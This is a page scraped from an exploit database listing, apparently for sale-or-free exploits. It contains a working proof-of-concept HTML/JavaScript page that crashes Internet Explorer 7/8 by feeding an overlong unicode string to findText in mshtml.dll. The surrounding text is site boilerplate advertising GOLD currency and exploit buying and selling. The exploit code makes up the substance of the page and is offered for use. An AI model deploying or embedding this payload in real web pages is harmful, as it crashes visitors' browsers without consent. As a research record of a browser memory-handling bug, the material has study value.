0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Internet Explorer 7/8 findText Unicode Parsing Crash Exploit
=============================================================== MS Internet Explorer 7/8 findText Unicode Parsing Crash Exploit =============================================================== <meta http-equiv="Context-Type" content="text/html; charset=US-ASCII"> <!-- Title: MS Internet Explorer findText Unicode Parsing error Vulnerability (mshtml.dll) Bug discovered: Hong10 PoC code: AmesianX & Hong10 Critical: low Impact: MS Internet Explorer 7/8 Crash Where: From remote Tested Operating System: Windows XP SP3 FULL PATCHED (Korean Language) Solution: I don't know.. Description: The following bug was tested on the latest version of Internet Explorer 7/8. by research team NSHC --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><title>IE findText crash</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body> <input type="button" value="exploit" onclick="do_crash();"> Hit the button after ie7/8 crash.. <script> function do_crash() { var o1=document.createElement("input"); o1.type="text"; //or password o1.id="powerhacker"; o1.value="AAAA"; document.body.appendChild(o1); var r= o1.createTextRange(); r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1); //maybe string length allocated stack but over length allocated heap memory //r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1,131072); //this code is no crash becase 3 parameter } </script> </body></html> <html><body></body></html> # 0day.today [2024-11-15] #